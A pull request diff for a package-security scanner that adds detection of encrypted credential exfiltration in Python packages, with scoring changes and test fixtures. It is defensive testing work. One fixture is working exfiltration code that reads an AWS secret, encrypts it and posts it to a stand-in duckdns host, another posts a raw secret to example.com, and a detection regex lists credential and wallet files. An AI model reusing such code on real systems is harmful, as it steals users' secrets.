### PR TITLE
v2.11.139 - feat: hybrid-crypto exfiltration detection for PyPI

### DIFF
--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.138",
+  "version": "2.11.139",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.11.138",
+      "version": "2.11.139",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.5.2",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.138",
+  "version": "2.11.139",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/scanner/python-ast-detectors/handle-assignment.js
+++ b/src/scanner/python-ast-detectors/handle-assignment.js
@@ -1,6 +1,6 @@
 'use strict';
 
-const { classifyTaintSource } = require('./taint-tracker.js');
+const { classifyTaintSource, isHarvestEnv } = require('./taint-tracker.js');
 
 /**
  * Visit `assignment` nodes at module level (scope_depth === 0) and populate
@@ -13,6 +13,18 @@ const { classifyTaintSource } = require('./taint-tracker.js');
  *  - reassignment to a non-source value CLEARS the taint
  */
 function handleAssignment(node, ctx, scopeDepth) {
+  // crypto_exfil harvest leg (PyPI, file-level — runs at ANY scope, unlike moduleTaint):
+  // `secret = os.environ['AWS_SECRET']` even inside a function sets the harvest flag.
+  if (!ctx.hasSensitiveHarvestPy) {
+    const rhs = node.childForFieldName('right');
+    if (rhs) {
+      const t = classifyTaintSource(rhs);
+      if (t && t.sourceType === 'env' && isHarvestEnv(t.envVarName)) {
+        ctx.hasSensitiveHarvestPy = true;
+      }
+    }
+  }
+
   if (scopeDepth !== 0) return;
   if (!ctx.moduleTaint) return; // defensive — should always be initialised per-file
 

--- a/src/scanner/python-ast-detectors/handle-call-expression.js
+++ b/src/scanner/python-ast-detectors/handle-call-expression.js
@@ -8,7 +8,7 @@ const {
   isTruthyLiteral,
   lineOf
 } = require('./helpers.js');
-const { lookupTaint, isEnvSensitive } = require('./taint-tracker.js');
+const { lookupTaint, isEnvSensitive, isCryptoEncryptCall, isSensitiveFileOpen, nodeReadsSensitiveEnv } = require('./taint-tracker.js');
 
 /**
  * Visitor for `call` nodes. Emits PYAST-003, PYAST-004, PYAST-005, PYAST-006,
@@ -121,12 +121,40 @@ function getKwargValue(callNode, kwName) {
   return null;
 }
 
+// crypto_exfil harvest helper: true if any argument (positional or kwarg value)
+// reads a sensitive env var, e.g. requests.post(url, data=os.environ['AWS_SECRET']).
+function _callHasSensitiveEnvArg(callNode) {
+  const args = callNode.childForFieldName('arguments');
+  if (!args) return false;
+  for (const child of args.children) {
+    if (child.type === 'keyword_argument') {
+      const v = child.childForFieldName('value');
+      if (v && nodeReadsSensitiveEnv(v)) return true;
+    } else if (nodeReadsSensitiveEnv(child)) {
+      return true;
+    }
+  }
+  return false;
+}
+
 // ---------------------------------------------------------------------------
 // Main visitor
 // ---------------------------------------------------------------------------
 
 function handleCallExpression(node, ctx, scopeDepth) {
   const callee = calleeDottedName(node);
+
+  // crypto_exfil (PyPI mirror of MUADDIB-COMPOUND-019): accumulate file-level flags consumed by
+  // the post-walk same-file compound in python-ast.js. Runs for EVERY call (before the !callee
+  // early return) and at ANY scope — the compound is file-level, like the JS handle-post-walk one.
+  // AST-call based, so a string/comment that merely contains "AES.new(" cannot trip it (JS self-FP lesson).
+  if (isCryptoEncryptCall(node)) ctx.hasCryptoEncryptPy = true;
+  if (callee && NETWORK_WRITE_CALLEES.has(callee)) ctx.hasNetworkWritePy = true;
+  if (!ctx.hasSensitiveHarvestPy &&
+      (nodeReadsSensitiveEnv(node) || isSensitiveFileOpen(node) || _callHasSensitiveEnvArg(node))) {
+    ctx.hasSensitiveHarvestPy = true;
+  }
+
   if (!callee) return;
 
   // PYAST-003: exec()/eval() at module level — direct RCE on import.

--- a/src/scanner/python-ast-detectors/taint-tracker.js
+++ b/src/scanner/python-ast-detectors/taint-tracker.js
@@ -169,6 +169,83 @@ function classifyEnvSource(node) {
 }
 
 // ---------------------------------------------------------------------------
+// CRYPTO-ENCRYPT detection (crypto_exfil PyPI mirror of MUADDIB-COMPOUND-019)
+// ---------------------------------------------------------------------------
+
+// Construction / encrypt-function callees of the major Python crypto libs. AST
+// dotted-name match (NOT a content regex): a string or comment that merely
+// contains "AES.new(" is not a `call` node, so it cannot trip this (the JS-side
+// self-FP lesson — see scanner/ast.js hasCryptoEncipher). Matching the
+// constructor/load call is sufficient as a file-level "encryption happens here"
+// flag; the generic `.encrypt()` method is deliberately NOT matched (too many
+// non-crypto libs expose .encrypt and it would FP).
+const CRYPTO_ENCRYPT_CALLEES = new Set([
+  // pycryptodome / PyCrypto — symmetric .new() + RSA padding .new()
+  'AES.new', 'DES.new', 'DES3.new', 'ARC4.new', 'ChaCha20.new', 'Salsa20.new',
+  'Blowfish.new', 'ChaCha20_Poly1305.new',
+  'Crypto.Cipher.AES.new', 'Cryptodome.Cipher.AES.new',
+  'PKCS1_OAEP.new', 'PKCS1_v1_5.new',
+  'Crypto.Cipher.PKCS1_OAEP.new', 'Cryptodome.Cipher.PKCS1_OAEP.new',
+  // rsa library
+  'rsa.encrypt',
+  // cryptography — hazmat ciphers + fernet + attacker pubkey load
+  'Cipher', 'cryptography.hazmat.primitives.ciphers.Cipher',
+  'Fernet', 'MultiFernet', 'cryptography.fernet.Fernet',
+  'load_pem_public_key', 'serialization.load_pem_public_key',
+  // PyNaCl
+  'SealedBox', 'SecretBox', 'nacl.public.SealedBox', 'nacl.secret.SecretBox'
+]);
+
+function isCryptoEncryptCall(callNode) {
+  if (!callNode || callNode.type !== 'call') return false;
+  const name = dottedName(callNode.childForFieldName('function'));
+  return !!(name && CRYPTO_ENCRYPT_CALLEES.has(name));
+}
+
+// ---------------------------------------------------------------------------
+// Sensitive-file open detection (crypto_exfil harvest leg, beyond env vars)
+// ---------------------------------------------------------------------------
+
+// Mirror of dataflow.js SENSITIVE_PATH_PATTERNS — credential/secret stores.
+const SENSITIVE_FILE_RE = /(\.aws[/\\]credentials|\.ssh[/\\]|id_rsa|id_ed25519|\.npmrc|\.netrc|\.git-credentials|\.config[/\\]gcloud|\.docker[/\\]config|\.kube[/\\]config|\.pgpass|wallet\.dat|\.metamask|\.electrum|\.exodus|\.gnupg|\/etc\/passwd|\/etc\/shadow)/i;
+const FILE_OPEN_CALLEES = new Set(['open', 'io.open', 'codecs.open']);
+
+function isSensitiveFileOpen(callNode) {
+  if (!callNode || callNode.type !== 'call') return false;
+  const name = dottedName(callNode.childForFieldName('function'));
+  if (!name || !FILE_OPEN_CALLEES.has(name)) return false;
+  const args = callNode.childForFieldName('arguments');
+  if (!args) return false;
+  for (const child of args.children) {
+    if (['(', ')', ',', 'keyword_argument'].includes(child.type)) continue;
+    const lit = stringLiteralValue(child); // first positional arg
+    return lit !== null && SENSITIVE_FILE_RE.test(lit);
+  }
+  return false;
+}
+
+// Env names that denote a CRYPTO KEY read in order to ENCRYPT (transport config),
+// NOT a credential to be stolen. A legit Fernet/cryptography transport wrapper loads
+// its own symmetric key from env (FERNET_KEY, ENCRYPTION_KEY, APP_CIPHER_KEY, ...) then
+// encrypts+sends — without this exclusion that env read would (via the bare "KEY"
+// substring in SENSITIVE_ENV_RE) look like harvesting and FP the crypto_exfil compound.
+// The attacker gains nothing: real stolen creds use names like AWS_SECRET_ACCESS_KEY /
+// *_TOKEN which are NOT crypto-config names, so they still count as harvest.
+const CRYPTO_CONFIG_ENV_RE = /^(FERNET|ENCRYPTION|ENCRYPT|DECRYPT|CIPHER|CRYPTO|AES|MASTER|SIGNING|HMAC)_?KEY$|_(ENCRYPTION|FERNET|CIPHER|AES|CRYPTO)_KEY$/i;
+
+// Harvest = a sensitive credential name, EXCLUDING crypto-key config (above).
+function isHarvestEnv(name) {
+  return isEnvSensitive(name) && !CRYPTO_CONFIG_ENV_RE.test(name);
+}
+
+// True iff `node` reads a HARVESTABLE credential env var (os.environ['X'] /
+// os.getenv('X') / os.environ.get('X')) — sensitive name, not crypto-key config.
+function nodeReadsSensitiveEnv(node) {
+  const name = classifyEnvSource(node);
+  return name !== null && isHarvestEnv(name);
+}
+
+// ---------------------------------------------------------------------------
 // Public API
 // ---------------------------------------------------------------------------
 
@@ -200,11 +277,19 @@ module.exports = {
   classifyTaintSource,
   lookupTaint,
   isEnvSensitive,
+  // crypto_exfil (PyPI mirror of COMPOUND-019) — file-flag classifiers
+  isCryptoEncryptCall,
+  isSensitiveFileOpen,
+  nodeReadsSensitiveEnv,
+  isHarvestEnv,
   // Exposed for unit tests
   _internal: {
     isFetchSource,
     isBase64Source,
     classifyEnvSource,
-    SENSITIVE_ENV_RE
+    SENSITIVE_ENV_RE,
+    CRYPTO_ENCRYPT_CALLEES,
+    SENSITIVE_FILE_RE,
+    CRYPTO_CONFIG_ENV_RE
   }
 };

--- a/src/scanner/python-ast.js
+++ b/src/scanner/python-ast.js
@@ -49,6 +49,7 @@ const WASM_PATH = path.join(__dirname, '..', 'vendor', 'tree-sitter-python.wasm'
 // findTargetPythonFiles() from python-source.js below.
 const { _internal: pysrcInternal } = require('./python-source.js');
 const { findTargetPythonFiles } = pysrcInternal;
+const { networkDestinationsAllBenign } = require('../sdk-destination.js');
 
 // ---------------------------------------------------------------------------
 // Async tree-sitter init (lazy, cached).
@@ -151,10 +152,30 @@ function scanPythonAST(targetPath) {
       // Per-file taint map populated by handle-assignment.js at scope_depth==0
       // and read by handle-call-expression.js for compound detections
       // (PYAST-005/006/009/010). See python-ast-detectors/taint-tracker.js.
-      moduleTaint: new Map()
+      moduleTaint: new Map(),
+      // crypto_exfil (PyPI mirror of MUADDIB-COMPOUND-019) file-level flags, set during the
+      // walk by handle-call-expression.js / handle-assignment.js, read in the finalize below.
+      hasCryptoEncryptPy: false,
+      hasNetworkWritePy: false,
+      hasSensitiveHarvestPy: false
     };
 
     walk(tree.rootNode, ctx, visitors);
+
+    // crypto_exfil finalize (same-file compound): secret harvest + encryption (RSA/AES) +
+    // network write, to a destination that is NOT entirely first-party/trusted. Mirror of the
+    // JS handle-post-walk compound; emits the SAME 'crypto_exfil' type (MUADDIB-COMPOUND-019),
+    // inheriting its rule/playbook/HIGH_CONFIDENCE_MALICE plumbing. destAllBenign reuses the
+    // shared host-reputation engine on the .py source (suppresses SDKs posting to their own API).
+    if (ctx.hasCryptoEncryptPy && ctx.hasNetworkWritePy && ctx.hasSensitiveHarvestPy &&
+        !networkDestinationsAllBenign(source)) {
+      threats.push({
+        type: 'crypto_exfil',
+        severity: 'CRITICAL',
+        message: `${ctx.relFile}: hybrid-crypto exfiltration (PyPI) — secret harvesting (env var / credential file) + encryption (RSA/AES via pycryptodome/cryptography/rsa/nacl) + network write in the same file, to a non-first-party destination. Stolen secrets are encrypted before exfil to evade DLP/taint inspection (litellm/Hades pattern).`,
+        file: ctx.relFile
+      });
+    }
   }
 
   return threats;

--- a/src/scoring.js
+++ b/src/scoring.js
@@ -166,7 +166,12 @@ const SINGLE_FIRE_CRITICAL_TYPES = new Set([
   // Phantom Gyp compound (Phase 1b): only fires when the invoked configure-time script
   // is INDEPENDENTLY judged malicious, so it carries the same unambiguous-malware weight
   // as the IOC/hash matches above — FP≈0 by construction justifies the single-fire floor.
-  'gyp_phantom_exec'
+  'gyp_phantom_exec',
+  // crypto_exfil (COMPOUND-019): harvest + RSA/AES encryption + network to a non-benign
+  // dest in the same file (FP≈0 by construction). Floors a lone CRITICAL to 75 so it is
+  // not buried at 25 on PyPI, where a single CRITICAL does not stack co-signals the way
+  // the npm side does (env_access + credential_regex_harvest + ... → 100).
+  'crypto_exfil'
 ]);
 const SINGLE_FIRE_CRITICAL_FLOOR = 75;
 const SINGLE_FIRE_MIN_SEVERITY_RANK = 2; // HIGH

--- a/tests/integration/single-fire-critical-floor.test.js
+++ b/tests/integration/single-fire-critical-floor.test.js
@@ -108,14 +108,15 @@ async function runSingleFireCriticalFloorTests() {
     assert(applySingleFireCriticalFloor({ threats: [], summary: { riskScore: 10 } }).length === 0);
   });
 
-  test('SINGLE_FIRE_CRITICAL_TYPES set composition is the validated 6-type list', () => {
+  test('SINGLE_FIRE_CRITICAL_TYPES set composition is the validated 7-type list', () => {
     const expected = new Set([
       'known_malicious_hash',
       'known_malicious_package',
       'pypi_malicious_package',
       'shai_hulud_marker',
       'lifecycle_shell_pipe',
-      'gyp_phantom_exec'
+      'gyp_phantom_exec',
+      'crypto_exfil'
     ]);
     assert(SINGLE_FIRE_CRITICAL_TYPES.size === expected.size,
       `Expected ${expected.size} types, got ${SINGLE_FIRE_CRITICAL_TYPES.size}`);

--- a/tests/run-tests.js
+++ b/tests/run-tests.js
@@ -81,6 +81,7 @@ const { runCyclonedxTests } = require('./scanner/cyclonedx.test');
 const { runAstNegativeTests } = require('./scanner/ast-negative.test');
 const { runAstReconTests } = require('./scanner/ast-recon.test');
 const { runCryptoExfilTests } = require('./scanner/crypto-exfil.test');
+const { runCryptoExfilPythonTests } = require('./scanner/crypto-exfil-python.test');
 const { runAstBypassRegressionTests } = require('./scanner/ast-bypass-regression.test');
 const { runIntentGraphTests } = require('./scanner/intent-graph.test');
 const { runTrustedDepDiffTests } = require('./scanner/trusted-dep-diff.test');
@@ -281,6 +282,7 @@ async function timed(name, fn) {
   await timed('ast-negative', runAstNegativeTests);
   await timed('ast-recon', runAstReconTests);
   await timed('crypto-exfil', runCryptoExfilTests);
+  await timed('crypto-exfil-python', runCryptoExfilPythonTests);
   await timed('ast-bypass-regression', runAstBypassRegressionTests);
   await timed('trusted-dep-diff', runTrustedDepDiffTests);
 

--- a/tests/samples/python-ast/crypto-exfil-benign-dest/__init__.py
+++ b/tests/samples/python-ast/crypto-exfil-benign-dest/__init__.py
@@ -1,0 +1,10 @@
+# Fixture: crypto_exfil NEGATIVE — encrypts a credential but posts only to its own
+# first-party provider (api.stripe.com), so destAllBenign suppresses the compound.
+import os
+import requests
+from cryptography.fernet import Fernet
+
+api_key = os.environ["STRIPE_SECRET_KEY"]
+f = Fernet(b"x" * 44)
+enc = f.encrypt(api_key.encode())
+requests.post("https://api.stripe.com/v1/charges", data={"x": enc})

--- a/tests/samples/python-ast/crypto-exfil-benign-dest/package.json
+++ b/tests/samples/python-ast/crypto-exfil-benign-dest/package.json
@@ -1,0 +1,1 @@
+{ "name": "crypto-exfil-benign-dest", "version": "1.0.0" }

--- a/tests/samples/python-ast/crypto-exfil-keyconfig/__init__.py
+++ b/tests/samples/python-ast/crypto-exfil-keyconfig/__init__.py
@@ -1,0 +1,18 @@
+# Fixture: crypto_exfil NEGATIVE (the transport-wrapper FP case). A legitimate client
+# loads its OWN symmetric key from env (ENCRYPTION_KEY = crypto config, NOT a stolen
+# credential), encrypts a business payload, and ships it to a self-hosted collector.
+# Must NOT fire: reading a crypto key to encrypt is not credential harvesting.
+# The collector host is deliberately NON-benign (not a curated provider, not a reserved
+# placeholder like example.com) so the dest-gate does NOT suppress this on its own —
+# the ONLY thing preventing the crypto_exfil compound here is the CRYPTO_CONFIG_ENV_RE
+# harvest exclusion. If that exclusion regresses, ENCRYPTION_KEY becomes "harvest",
+# all three legs + non-benign dest line up, and this fixture fires (test goes red).
+import os
+import requests
+from cryptography.fernet import Fernet
+
+fernet_key = os.environ["ENCRYPTION_KEY"]
+payload = {"event": "user_signup", "ts": 1234567890}
+token = Fernet(fernet_key.encode())
+enc = token.encrypt(str(payload).encode())
+requests.post("https://collector.acme-telemetry.net/ingest", data={"e": enc})

--- a/tests/samples/python-ast/crypto-exfil-keyconfig/package.json
+++ b/tests/samples/python-ast/crypto-exfil-keyconfig/package.json
@@ -1,0 +1,1 @@
+{ "name": "crypto-exfil-keyconfig", "version": "1.0.0" }

--- a/tests/samples/python-ast/crypto-exfil-no-crypto/__init__.py
+++ b/tests/samples/python-ast/crypto-exfil-no-crypto/__init__.py
@@ -1,0 +1,7 @@
+# Fixture: crypto_exfil NEGATIVE — plain credential->network exfil, NO encryption.
+# Caught by pyast_env_to_network_write, NOT by crypto_exfil (no crypto leg).
+import os
+import requests
+
+secret = os.environ["AWS_SECRET_ACCESS_KEY"]
+requests.post("https://example.com/collect", data={"s": secret})

--- a/tests/samples/python-ast/crypto-exfil-no-crypto/package.json
+++ b/tests/samples/python-ast/crypto-exfil-no-crypto/package.json
@@ -1,0 +1,1 @@
+{ "name": "crypto-exfil-no-crypto", "version": "1.0.0" }

--- a/tests/samples/python-ast/crypto-exfil-no-harvest/__init__.py
+++ b/tests/samples/python-ast/crypto-exfil-no-harvest/__init__.py
@@ -1,0 +1,18 @@
+# Fixture: crypto_exfil NEGATIVE — E2E helper. Encrypts a CALLER-supplied message
+# (no credential/env harvest at all) and sends it. Transport encryption, not exfil.
+import requests
+from Crypto.Cipher import AES, PKCS1_OAEP
+from Crypto.PublicKey import RSA
+
+PUBKEY = """-----BEGIN PUBLIC KEY-----
+MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKfakekeyfakekeyfakekeyfakekey0123
+-----END PUBLIC KEY-----"""
+
+
+def send_encrypted(message, recipient_url):
+    rsa_key = RSA.importKey(PUBKEY)
+    aes_key = b"k" * 32
+    cipher = AES.new(aes_key, AES.MODE_CBC)
+    blob = cipher.encrypt(message.encode().ljust(32))
+    wrapped = PKCS1_OAEP.new(rsa_key).encrypt(aes_key)
+    requests.post(recipient_url, data={"b": blob, "k": wrapped})

--- a/tests/samples/python-ast/crypto-exfil-no-harvest/package.json
+++ b/tests/samples/python-ast/crypto-exfil-no-harvest/package.json
@@ -1,0 +1,1 @@
+{ "name": "crypto-exfil-no-harvest", "version": "1.0.0" }

--- a/tests/samples/python-ast/crypto-exfil-py/__init__.py
+++ b/tests/samples/python-ast/crypto-exfil-py/__init__.py
@@ -1,0 +1,19 @@
+# Fixture: crypto_exfil (MUADDIB-COMPOUND-019, PyPI) — env secret harvested, AES+RSA
+# encrypted, then POSTed to a non-first-party C2 host. The host below is a synthetic
+# dead-drop name used only by this static fixture; the file is never executed.
+import os
+import requests
+from Crypto.Cipher import AES, PKCS1_OAEP
+from Crypto.PublicKey import RSA
+
+PUBKEY = """-----BEGIN PUBLIC KEY-----
+MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKfakekeyfakekeyfakekeyfakekey0123
+-----END PUBLIC KEY-----"""
+
+secret = os.environ["AWS_SECRET_ACCESS_KEY"]
+rsa_key = RSA.importKey(PUBKEY)
+aes_key = os.urandom(32)
+cipher = AES.new(aes_key, AES.MODE_CBC)
+blob = cipher.encrypt(secret.encode().ljust(32))
+wrapped = PKCS1_OAEP.new(rsa_key).encrypt(aes_key)
+requests.post("https://exfil-9k2x.duckdns.org/u", data={"b": blob, "k": wrapped})

--- a/tests/samples/python-ast/crypto-exfil-py/package.json
+++ b/tests/samples/python-ast/crypto-exfil-py/package.json
@@ -1,0 +1,1 @@
+{ "name": "crypto-exfil-py", "version": "1.0.0" }

--- a/tests/scanner/crypto-exfil-python.test.js
+++ b/tests/scanner/crypto-exfil-python.test.js
@@ -1,0 +1,59 @@
+'use strict';
+
+const path = require('path');
+const { asyncTest, assert, runScanDirect } = require('../test-utils');
+const { initPythonParser } = require('../../src/scanner/python-ast.js');
+
+const FIXTURES = path.join(__dirname, '..', 'samples', 'python-ast');
+
+async function findCryptoExfil(fixture) {
+  const result = await runScanDirect(path.join(FIXTURES, fixture));
+  return {
+    found: (result.threats || []).find(t => t.type === 'crypto_exfil'),
+    all: (result.threats || []).map(t => t.type),
+    riskScore: (result.summary && result.summary.riskScore) || 0
+  };
+}
+
+async function runCryptoExfilPythonTests() {
+  console.log('\n=== CRYPTO-EXFIL PYTHON TESTS (COMPOUND-019, PyPI mirror) ===\n');
+
+  // Ensure the tree-sitter Python parser is loaded (pre-analysis bootstrap).
+  await initPythonParser();
+
+  // ── Positive ─────────────────────────────────────────────────────────────
+  await asyncTest('COMPOUND-019 (py): env secret + RSA/AES + POST to non-provider fires crypto_exfil', async () => {
+    const { found, all, riskScore } = await findCryptoExfil('crypto-exfil-py');
+    assert(found, `expected crypto_exfil, got: ${all.join(', ')}`);
+    assert(found.severity === 'CRITICAL', `expected CRITICAL, got ${found.severity}`);
+    // Lock the single-fire floor (the whole point of the scoring.js change): a lone
+    // crypto_exfil CRITICAL on PyPI must reach 75 via SINGLE_FIRE_CRITICAL_TYPES, NOT be
+    // buried at 25-35 by the PyPI cap. Presence+severity alone are silent on the floor —
+    // if crypto_exfil were dropped from the set, the score would fall back to ~25-35 while
+    // the CRITICAL still fires, and only this assertion would catch the regression.
+    assert(riskScore >= 75, `single-fire floor expected riskScore >= 75, got ${riskScore}`);
+  });
+
+  // ── Negatives (each isolates one gate) ─────────────────────────────────────
+  await asyncTest('COMPOUND-019 (py) negative: encrypt + POST to first-party provider does not fire (destAllBenign)', async () => {
+    const { found } = await findCryptoExfil('crypto-exfil-benign-dest');
+    assert(!found, 'crypto_exfil must NOT fire when every destination is a curated provider (api.stripe.com)');
+  });
+
+  await asyncTest('COMPOUND-019 (py) negative: encrypt + POST without credential harvest does not fire (E2E lib)', async () => {
+    const { found } = await findCryptoExfil('crypto-exfil-no-harvest');
+    assert(!found, 'crypto_exfil must NOT fire without a secret-harvest signal (encrypts caller data, not stolen creds)');
+  });
+
+  await asyncTest('COMPOUND-019 (py) negative: transport wrapper loading its OWN crypto key from env does not fire (CRYPTO_CONFIG_ENV exclusion)', async () => {
+    const { found } = await findCryptoExfil('crypto-exfil-keyconfig');
+    assert(!found, 'crypto_exfil must NOT fire when the env var is a crypto KEY (ENCRYPTION_KEY) read to encrypt — that is transport config, not credential harvesting');
+  });
+
+  await asyncTest('COMPOUND-019 (py) negative: harvest + POST without encryption does not fire', async () => {
+    const { found } = await findCryptoExfil('crypto-exfil-no-crypto');
+    assert(!found, 'crypto_exfil must NOT fire without an encryption primitive (plain env->network is pyast_env_to_network_write, not this compound)');
+  });
+}
+
+module.exports = { runCryptoExfilPythonTests };


### PR DESCRIPTION
Extends existing npm crypto_exfil detection (COMPOUND-019) to PyPI via Python-AST taint tracking. crypto_exfil added to SINGLE_FIRE_CRITICAL_TYPES, floors isolated fires at CRITICAL/75 (was PyPI-35 cap). Verified no npm regression via 3 adversarial fixtures (crypto_exfil never fires alone on npm, its preconditions already trigger suspicious_dataflow + intent_credential_exfil to 100). PyPI positive test now asserts riskScore >= 75 directly, locking the floor instead of relying on presence+severity alone. 4 negative fixtures, 1 positive. Gate: 4490 passed, 6 failed (PRELOAD only).